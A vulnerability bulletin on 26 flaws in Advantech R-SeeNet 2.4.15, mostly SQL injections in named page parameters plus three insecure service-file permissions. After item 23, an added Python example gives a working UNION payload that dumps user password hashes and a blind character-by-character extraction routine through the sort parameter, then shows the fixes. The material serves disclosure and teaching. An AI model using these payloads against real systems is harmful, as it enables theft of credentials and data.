Multiple vulnerabilities in Advantech R-SeeNet



Published: 2021-11-23 | Updated: 2021-12-16
Risk: Medium
Patch available: Yes
Number of vulnerabilities: 26
CVE-ID: CVE-2021-21910, CVE-2021-21911, CVE-2021-21912, CVE-2021-21915, CVE-2021-21916, CVE-2021-21917, CVE-2021-21918, CVE-2021-21919, CVE-2021-21920, CVE-2021-21921, CVE-2021-21922, CVE-2021-21923, CVE-2021-21924, CVE-2021-21925, CVE-2021-21926, CVE-2021-21927, CVE-2021-21928, CVE-2021-21929, CVE-2021-21930, CVE-2021-21931, CVE-2021-21932, CVE-2021-21933, CVE-2021-21934, CVE-2021-21935, CVE-2021-21936, CVE-2021-21937
CWE-ID: CWE-89, CWE-276
Exploitation vector: Network
Public exploit: N/A
Vulnerable software: R-SeeNet (Server applications / Other server solutions)
Vendor: Advantech Co., Ltd

Security Bulletin

This security bulletin contains information about 26 vulnerabilities.

1) SQL injection

EUVDB-ID: #VU58297

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21918

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "name_filter" parameter of the "company_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1364
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

2) SQL injection

EUVDB-ID: #VU58298

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21919

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "ord" parameter of the "company_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1364
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

3) SQL injection

EUVDB-ID: #VU58327

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21926

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "health_filter" parameter of the "sn_filter" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

4) SQL injection

EUVDB-ID: #VU58326

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21937

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "host_alt_filter" parameter of the "sn_filter" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

5) SQL injection

EUVDB-ID: #VU58325

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21936

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "health_alt_filter" parameter of the "sn_filter" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

6) SQL injection

EUVDB-ID: #VU58324

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21935

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "host_alt_filter2" parameter of the "sn_filter" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

7) SQL injection

EUVDB-ID: #VU58323

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21934

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "imei_filter" parameter of the "sn_filter" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

8) SQL injection

EUVDB-ID: #VU58322

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21933

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "esn_filter" parameter of the "sn_filter" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

9) SQL injection

EUVDB-ID: #VU58321

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21932

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "name_filter" parameter of the "sn_filter" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

10) SQL injection

EUVDB-ID: #VU58320

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21931

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "stat_filter" parameter of the "sn_filter" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

11) SQL injection

EUVDB-ID: #VU58319

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21930

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "prod_filter" parameter of the "sn_filter" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

12) SQL injection

EUVDB-ID: #VU58318

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21929

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "prod_filter" parameter of the "mac_filter" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

13) SQL injection

EUVDB-ID: #VU58317

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21928

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "loc_filter" parameter of the "mac_filter" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

14) SQL injection

EUVDB-ID: #VU58316

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21927

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "loc_filter" parameter of the "device_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

15) SQL injection

EUVDB-ID: #VU58315

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21925

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "firm_filter" parameter of the "device_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

16) SQL injection

EUVDB-ID: #VU58314

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21924

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "desc_filter" parameter of the "device_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

17) SQL injection

EUVDB-ID: #VU58313

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21923

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "company_filter" parameter of the "user_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1365
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

18) SQL injection

EUVDB-ID: #VU58312

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21922

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "username_filter" parameter of the "user_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1365
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

19) SQL injection

EUVDB-ID: #VU58311

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21921

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "name_filter" parameter of the "user_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1365
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

20) SQL injection

EUVDB-ID: #VU58310

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21920

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "surname_filter" parameter of the "user_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1365
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

21) SQL injection

EUVDB-ID: #VU58306

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21917

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "ord" parameter of the "group_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1363
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

22) SQL injection

EUVDB-ID: #VU58303

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21916

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "description_filter" parameter of the "group_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1363
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

23) SQL injection

EUVDB-ID: #VU58302

Risk: Medium

CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21915

CWE-ID: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Exploit availability: No

Description

The vulnerability allows a remote attacker to execute arbitrary SQL queries against the application's database.

The vulnerability exists due to insufficient sanitization of user-supplied data passed in the "company_filter" parameter of the "group_list" page before it is used in an SQL query. A remote authenticated attacker can send a specially crafted request to the affected application and read sensitive information from the database.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1363
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.
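
The twenty-three SQL injections above share one root cause: a filter value or sort key taken from the request is spliced into the query text. The example below is added here and is not R-SeeNet code; its tables and rows are constructed for the demonstration, and it assumes that "ord" selects an ORDER BY column, which the bulletin does not state. It rebuilds a "company_list"-style page with a "name_filter" and an "ord" parameter, shows what an authenticated user can extract through each (a UNION through the value, a boolean oracle through the sort key), and applies the fix each one needs: a bound parameter for the value, and an allow-list for the column name, which a database driver cannot bind.

```python
import sqlite3

# Constructed stand-in for the application's company and user tables; the real
# R-SeeNet schema is not on the page and is not assumed here.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE company (id INTEGER PRIMARY KEY, name TEXT, city TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pwhash TEXT);
        INSERT INTO company VALUES (1, 'Acme', 'Prague'), (2, 'Globex', 'Brno');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db


def company_list_vulnerable(db, name_filter, ord_value):
    # The CWE-89 pattern: both request parameters are spliced into the SQL text.
    sql = ("SELECT id, name, city FROM company WHERE name LIKE '%" + name_filter
           + "%' ORDER BY " + ord_value)
    return db.execute(sql).fetchall()


# --- What an authenticated user can do with each parameter -------------------

# Closes the LIKE literal, appends a UNION over another table, comments out the rest.
UNION_PAYLOAD = "' UNION SELECT id, username, pwhash FROM users --"

def dump_users_via_name_filter(db):
    rows = company_list_vulnerable(db, UNION_PAYLOAD, "name")
    return [r for r in rows if r[1] == "admin"]

def leak_char_via_ord(db, pos, guess):
    """The sort key is an expression, so it works as a boolean oracle:
    sorting by name puts Acme first, sorting by city puts Globex first."""
    probe = ("(CASE WHEN (SELECT substr(pwhash, %d, 1) FROM users WHERE username = 'admin')"
             " = '%s' THEN name ELSE city END)" % (pos, guess))
    rows = company_list_vulnerable(db, "", probe)
    return rows[0][1] == "Acme"

def recover_prefix(db, length):
    """Drive the oracle character by character over the hex alphabet."""
    out = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            if leak_char_via_ord(db, pos, ch):
                out += ch
                break
    return out


# --- Fixes ------------------------------------------------------------------

# Sort keys are identifiers, which drivers cannot bind; map the request value
# onto a fixed set of column names instead of trusting it.
ORDER_COLUMNS = {"id": "id", "name": "name", "city": "city"}

def like_escape(s):
    # Binding stops quote injection but not LIKE metacharacters; escape them too.
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")

def company_list_fixed(db, name_filter, ord_value):
    column = ORDER_COLUMNS.get(ord_value)
    if column is None:
        raise ValueError("unsupported sort column: %r" % ord_value)
    # The filter value is bound as a parameter: quotes inside it stay data.
    sql = ("SELECT id, name, city FROM company WHERE name LIKE ? ESCAPE '\\' ORDER BY "
           + column)
    return db.execute(sql, ("%" + like_escape(name_filter) + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("dumped via name_filter:", dump_users_via_name_filter(db))
    print("hash prefix via ord:", recover_prefix(db, 8))
    print("fixed page, same payload:", company_list_fixed(db, UNION_PAYLOAD, "name"))
```

The two fixes differ because the sort key is an identifier: no driver binds column names, so the only safe option is mapping the request value onto a fixed set. The LIKE wildcards are escaped as well, since a "%" in the filter still behaves as a pattern after binding. Running the file directly prints the dumped user row, the recovered hash prefix, and the fixed page returning nothing for the same payload.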

24) Incorrect default permissions

EUVDB-ID: #VU58301

Risk: Low

CVSSv3.1: 7.7 [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21912

CWE-ID: CWE-276 - Incorrect Default Permissions

Exploit availability: No

Description

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists because the Windows installer sets incorrect default permissions on the binary of the "Apache2.2" service. A local user can modify the service binary and have the replacement executed with the privileges of the service, escalating privileges on the system.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1360
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

No. This vulnerability can be exploited locally. The attacker should have authentication credentials and successfully authenticate on the system.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

25) Incorrect default permissions

EUVDB-ID: #VU58300

Risk: Low

CVSSv3.1: 7.7 [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21911

CWE-ID: CWE-276 - Incorrect Default Permissions

Exploit availability: No

Description

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists because the Windows installer sets incorrect default permissions on the binary of the "SnmpMonSvs" service. A local user can modify the service binary and have the replacement executed with the privileges of the service, escalating privileges on the system.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1360
CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

No. This vulnerability can be exploited locally. The attacker should have authentication credentials and successfully authenticate on the system.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

26) Incorrect default permissions

EUVDB-ID: #VU58299

Risk: Low

CVSSv3.1: 7.7 [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C]

CVE-ID: CVE-2021-21910

CWE-ID: CWE-276 - Incorrect Default Permissions

Exploit availability: No

Description

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists because the Windows installer sets incorrect default permissions on the files of the "mysql" service. A local user can read or modify those files and use this to run code with the privileges of the service, escalating privileges on the system.

Mitigation

Install updates from vendor's website.

Vulnerable software versions

R-SeeNet: 2.4.15

External links

http://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1360
